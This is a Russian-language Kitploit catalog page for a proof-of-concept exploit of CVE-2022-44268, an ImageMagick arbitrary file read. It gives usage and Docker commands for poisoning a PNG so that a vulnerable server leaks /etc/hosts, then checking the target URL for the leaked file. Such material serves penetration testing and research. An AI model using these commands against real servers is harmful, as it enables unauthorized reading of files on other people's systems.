Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-44268 — CVE-2022-44268 ImageMagick произвольное чтение файлов — Proof of Concept эксплойт | Kitploit
Инструменты/GitHubGitHub/kljunowsky/cve-2022-44268
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubkljunowsky/cve-2022-44268

CVE-2022-44268

CVE-2022-44268 ImageMagick произвольное чтение файлов — Proof of Concept эксплойт

Репозиторий
2782 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-44268 🧙‍♂️

CVE-2022-44268 ImageMagick произвольное чтение файлов — эксплойт Proof of Concept

Видео 📼

https://youtu.be/quKxwNAMBIA

Использование 🛠

Отравляем изображение ☣️

root@kitploit:~
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
root@kitploit:~
Загрузите отравленное PNG-изображение.

Проверяем, успешен ли эксплойт 🗡

root@kitploit:~
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png

Запуск из Docker 🐳

Сборка

root@kitploit:~
docker build -t cve-2022-44268 .

Запуск

root@kitploit:~
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png

Параметры 🧰

Контакты 📇

Twitter - Milan Jovic

LinkedIn - Milan Jovic

Только в образовательных целях и не может использоваться для нарушения закона или личной выгоды.

Автор этого проекта не несет ответственности за любой возможный вред, причиненный материалами этого проекта.

Подробнее: https://www.metabaseq.com/imagemagick-zero-days/

Скачать инструмент
ПараметрОписаниеТип
--urlURL загруженного PNG-изображенияString
--imageВходной PNG-файлFile
--outputВыходной PNG-файлFile
--file-to-readФайл для чтения с уязвимого хостаString